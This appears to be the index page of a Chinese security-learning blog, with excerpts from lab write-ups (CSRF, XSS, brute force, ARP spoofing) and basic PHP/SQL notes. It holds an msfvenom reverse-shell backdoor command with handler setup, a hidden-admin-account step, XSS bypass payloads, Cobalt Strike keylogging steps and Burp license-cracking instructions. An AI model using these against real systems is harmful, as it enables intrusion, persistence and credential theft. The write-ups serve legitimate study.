weixin_66993139的博客

原创 CSRF思维导图

原创 CSRF之pikachu靶场DW

3，点击提交后，并查看是否修改成功。最后放通一下，发现账号信息被修改。1提交post数据并使用bp抓包。2，抓包并修改标记后的个人信息。2.利用工具改包，并生成url。

原创 搭建使用xss数据接收平台（蓝莲花）

4，由于改xss数据接收靶场存在一点问题，所以，这里需要访问一下http://127.0.0.1/BlueLotus_XSSReceiver-master/，再访问http://127.0.0.1/xss-master/admin.php，才能看到接收到的dvwa的cookie。3，将复制的payload，放到xss（post）模块执行。启动皮卡丘靶场，并打开反射型xss，复制url地址。2，将文件解压并放置在小皮系统WWW目录下。修改一个简单一点的名称用于访问。默认密码为：bluelotus。

原创 Xss-Master-lab靶场通关（1-10）

第十关，所以针对name属性为t_sort的input标签进行注入，可以闭合属性，构造新的属性，同时把type="hidden"属性替换掉，要不然看不到页面效果，payload如下。javascript:alert("xss")// 进行编码，编码好以后，添加一个网页链接。第八关，发现大小写绕过，标签闭合，xss字段做了处理，这时候可以使用编码绕过。第四关，通过源代码发现<>括号会转义，所以使用没有<>的语句。第九关，发现超链接进行了校验，可以利用ascii编码进行编码。可以使用闭合标签，在使用超链接。

原创 xss思维导图

原创 pikachu（1-5）、DVWA靶场通关wp

5，另一种场景就是，第一次输入后，会把输入的内容显示在URL中，然后后台把从URL中获取信息，将其赋值给a标签，点一下a标签，就会把其中的内容写到div里面，点击div对应的字段，即可执行脚本。在留言板中输入注入代码，储存型XSS是持续型XSS攻击，会把数据储存在数据库中。程序执行不依赖于服务器端的数据，从客户端获得DOM中的数据并在本地执行。XSS原理客户端的脚本程序可以通过DOM动态地检查和修改页面内容。通过访问提交的url，将提交的1进行修改。1，反射型XSS（get）pikachu靶站通关。

原创 pikachu靶站破解实验

由于Cluster bomb这个攻击模式会对两个字典所有的匹配情况进行遍历，所以结果的数量就是payload1和payload2各自数量的乘积。由于只涉及到username和password两个变量，可以利用bp的intruder模块来暴力破解。通过抓包发现token值，对密码以及token值进行爆破，且使用pitchfork鱼叉模式。这次我们在爆破之前，需要输入正确的验证码后，在进行爆破。扫描到admin账号密码，爆破成功。使用靶站进行登录，并使用bp抓包。3，使用bp抓包查看信息。1，登录皮卡丘靶站；

原创 弱口令于暴力破解思维导图

原创 php之面向对象

/写一个方形类Square: 类中的属性: 长, 宽 类中的方法: 1. 显示方向信息的方法:显示长和宽, 并且显示面积 测试: 生成一个方向对象s, 长为6,宽为5, 显示长和宽, 并且显示面积。echo "长方形长".$this->lenght."，长方形宽：".$this->width.",长方形面积为：".$area;

原创 php之继承

echo "姓名：".$this->name."，性别：".$this->sex."，颜色：".$this->colour."，品种：".$this->breed."，体重：".$this->height."斤，肩高：".$this->weight."，价钱：".$this->price.br;// 生成一个Dog对象t, 该对象的姓名"兔子", 性别"母", 颜色"银灰", 品种"泰迪", 体重"3.1"斤, 肩高"22", 价钱"5000"

原创 php之面向对象调用、赋值

echo "姓名：".$this->name."，性别：".$this->sex."，年龄：".$this->age."，身高：".$this->height."，体重：".$this->weight."，出生日期：".$this->birthe;//该对象的姓名"王二麻子", 性别"男", 年龄"17", 身高"176.5", 体重"73.5", 出生年月"1997/9/23",最后调用该对象的自我描述方法。

原创 PHP常见函数调用

/将字符串hello，word以逗号作为切割符，转换字符串为数组 //打印Array ( [0] => hello [1] => word )//合并两个数组，将a数组设置为键，b数组设置为值 //打印Array ( [a] => d [b] => e [c] => f )//打印Array ( [0] => zhangsan [1] => lisi [2] => wangwu [3] => chengliu )

原创 php之计算1~50奇数之和

echo '1到50的所有偶数和为：'.$count;

原创 php语法之计算1~100偶数之和

echo '1到100的所有偶数和为：'.$count;

原创 php代码之计算1到100累加之和

echo '1到100的所有值累加为：'.$count;

原创 php之for循环

echo '一共跑了'.$i.'圈！

原创 DNS欺骗

什么是DNS 域名系统（ Domain Name System ），是一种分布式网络目录服务，主要用于域名与 IP 地址的相互转换DNS特点：分散和分层的机制来实现域名空间的委派授权以及域名与地址相转换的授权DNS查询请求是层层传递，查询和应答无严格身份验证、会话无加密收到应答后DNS服务器会缓存结果。

原创 ARP断网、欺骗

ARP欺骗（英语：ARP spoofing），又称ARP毒化（ARP poisoning，网上上多译为ARP病毒）或ARP攻击，是针对以太网地址解析协议（ARP）的一种攻击技术，通过欺骗局域网内访问者PC的网关MAC地址，使访问者PC错以为攻击者更改后的MAC地址是网关的MAC，导致网络不通。arpspoof 是一款进行arp欺骗的工具，攻击者通过毒化受害者arp缓存，将网关mac替换为攻击者mac，然后攻击者可截获受害者发送和收到的数据包，可获取受害者账户、密码等相关敏感信息。

原创 TCP协议理论

第二次握手：服务端收到客户端的请求后，向客户端回应一个ACK+SYN，这个时候ack=x+1,seq=y.第三次挥手：等待数据传输完成后，服务端向客户端发送ACK+FIN断开请求，ack=a+1,seq=b;第三次握手：客户端收到收到服务端的收到请求后，向服务端回应一个ACK收到请求，这个时候ack=y+1。第二次挥手：服务端收到请求，服务端向客户端发送ACK，ack=a+1,seq=b;第三次挥手：客户端向服务端发送ACK收到请求，seq=a+1,ack=b+1;1，TCP头部中的确认标识位有什么作用？

原创 Linux常用命令大全

find /home/user1 -name \*.bin #在目录 '/ home/user1' 中搜索带有'.bin' 结尾的文件。mount /dev/hda2 /mnt/hda2 #挂载一个叫做hda2的盘 - 确定目录 '/ mnt/hda2' 已经存在。grep [0-9] /var/log/messages #选择 '/var/log/messages' 文件中所有包含数字的行。

原创 win系统必备DOS命令

例 子］ C:\>expand a:vsafe.co_ c:\dos\vsafe.com。［例 子］ C:\DOS>subst a: c:\temp 用c盘temp目录替代a盘。［例 子］ C:\>date 09-20-1996 将日期改为1996年9月20日。p5------------------------p10 公接头指接头为带针的。p6------------------------p11 母接头指接头为带孔的。［例 子］ c:\>move c:\autoexec.bat c:\old。

原创 win7系统创建隐藏用户

et localgroup administrators admin$ /add //提升隐藏用户权限，将隐藏用户添加到administrators组中。7，找到对应的隐藏用户，并把该隐藏用户以及对应的16进制文件都以.reg格式导出，同时也需要把超级管理员用户的16进制文件导出。它通常是由恶意用户在系统中植入的，目的是在未经授权的情况下获取对系统的控制权或执行未经授权的操作。3，从上所看，并没有通过命令查看到创建的用户，但是计算机管理中还是可以查看到该用户，所以还需要进一步隐藏。

原创 Oracle数据库操作

联合查询时，查询结果的列标题为第一个查询语句的列标题。select @name=b.name from syscolumns a,sysobjects b where a.id=object_id('表名') and b.id=a.cdefault and a.name='字段名' and b.name like 'DF%'在使用UNION运算符时，应保证每个联合查询语句的选择列表中有相同数量的表达式，并且每个查询选择表达式应具有相同的数据类型，或是可以自动将它们转换为相同的数据类型。

原创 SQL查询语句（全网最详细教学）

/在wages_tables表中查询字段age小于30的数据。//在wages_tables表中查询字段id、name、post。select * from wages_tables where name regexp "三$";//查询以三结尾的数据。select * from venus2 //查询多个表中的数据，要求两个表中数据必须一样，数据类型相同，默认不返回相同数据。select * from wages_tables where name like '%三';

原创 Mysql数据库基本操作

1，查看数据库，并创建一个数据库；2，进入该数据库，并创建一个表；3，添加数据，查看数据。

原创 xray工具的搭建和使用

Xray被动扫描需要注意的一个地方就是，在进行扫描的同时，它只能扫描浏览器访问的网页，所以在扫描的时候，需要自己浏览网站的各个模块，这个扫描模式相较于主动扫描，没那么容易被WAF发现。在下载的xray工具存放路径下进入cmd命令行，并创建ca证书。

原创 BURP工具的搭建

5，两个文件都打开的一个情况下，将我们左边的license里面的内容全部复制粘贴到我们的右边这个license key中。2，点击.bat文件，编辑里面的路径，换成我们现在的java路径，这里我的java环境变量在E盘下的jdk下面。6，点击manual activation,会生成新的一段代码，按照1,2,3,4的箭头所示，去进行复制粘贴。选择文件存放位置，建议放在桌面，特别需要注意的一点是，这里文件名需要的后缀是.der。7，点击next安装完成，之后再点击确认，打开之后的页面。

原创 HTTP协议的请求方法和响应响应状态

OPTIONS：请求查询服务器的性能，或者查询与资源相关的选项和需求。HEAD：请求获取request-url所标识的资源的响应消息报头。1××：提示信息，表示目前是协议处理的中间状态，还需要后续的操作；GET：请求获取reques-url（请求地址）所标识的资源。TRACE：请求服务器回送收到的请求信息，主要用于测试或诊断。3××：重定向，资源位置发生变动，需要客户端重新发送请求；5××：服务器错误，服务器在处理请求时内部发生了错误。4××：客户端错误，请求报文有误，服务器无法处理；

原创 cs工具使用

选择攻击---生成后面---选择 windows executable。选择监听器并勾选 x64payload。通过命令获得对方的ip地址。

原创 使用cs做网站克隆+键盘监听

创建克隆网站(克隆url中只能是http协议)2，进入cs目录，并赋予可读可写可执行的权限。1，将该cs压缩包单独放入一个文件。查看web日志（最终实现键盘监控）linux中直接运行该文件。3，设置cs的IP和密码。

原创 msfvenom恶意程序利用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=6060 -f exe > Muma.exe //生成后门程序。set payload windows/meterpreter/reverse_tcp //设置攻击载荷。将生成后门文件Muma.exe上传至win7系统后，在win7系统双击并执行此文件。use exploit/multi/handler //模块加载。启动msfconsole。

原创 Nmap命令详细介绍(上帝之眼)

FIN扫描向目标主机的端口发送的TCP FIN 包括Xmas tree包或NULL包，如果收到对方的RST回复包，那么说明该端口是关闭的；因为仅发送SYN包对目标主机的特定端口，但不建立完整的TCP连接，所以相对比较隐蔽，而且效率比较高，适用范围广。UDP扫描用于判断UDP端口的情况，向目标主机的UDP端口发送探测包，如果收到回复ICMP port unreachable就说明该端口是关闭的；nmap 192.168.1.1-5 -PA22-25,80 端口X上的TCP ACK发现,默认80。

原创 渗透测试过程环节（理论）

在目标范围确定之后，将进入情报搜集（Information Gathering）阶段，渗透测试团队可以利用各种信息来源与搜集技术方法，尝试获取更多关于目。在该阶段，渗透测试者需要综合分析前几个阶段获取并汇总的情报信息，特。洞探测与挖掘，期望找出可被利用的未知安全漏洞，并开发出渗透代码，从。中，渗透测试团队需要利用他们所找出的目标系统安全漏洞，来真正入侵系。成非常普遍的目标，而在这个环节中，需要渗透测试团队根据目标组织的业。击的过程，以及造成业务影响后果的攻击途径，同时还要站在防御者的角度。

原创 mysql数据库搭建完整流程linux版本

MySQL服务搭建流程 超详细讲解 附命令